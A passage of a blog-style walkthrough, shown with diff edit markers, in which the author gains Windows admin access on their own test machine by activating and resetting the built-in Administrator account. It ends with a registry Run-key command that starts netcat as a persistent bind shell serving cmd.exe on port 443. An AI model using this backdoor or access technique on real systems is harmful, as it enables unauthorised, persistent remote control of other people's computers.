 Here some people said to have found limitations because the firewall would detect the exploit.
 This could probably be bypassed by using the first command-line window to disable the firewall, but I had no problem with this.

 It wasn’t supposed to request me any other permissions to change the user password since I was doing it with admin privileges, but still, Windows was refusing it.
 I guess this is a result of some configuration that I made earlier that deny access to the admin.

 I tried some things to get around this problem, but I couldn't find a solution until I remembered...

 So I checked for the admin account, activated it and was able to change its password.

 In the end, I didn’t get access to access to the user I wanted (guinea-pig), but I got to access the Admin account - even better.
-From there I verified that I could still access any personal file from the user account.
+From there I verified that I still had the permission to do pretty much everything, including accessing any personal file from the user account.

 Just for fun, and to show you there’s some other stuff you can do after you get access to an admin account.
 From a terminal, I executed the following command:

 REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /d “C:\windows\system32\nc.exe -ldp 443 -e cmd.exe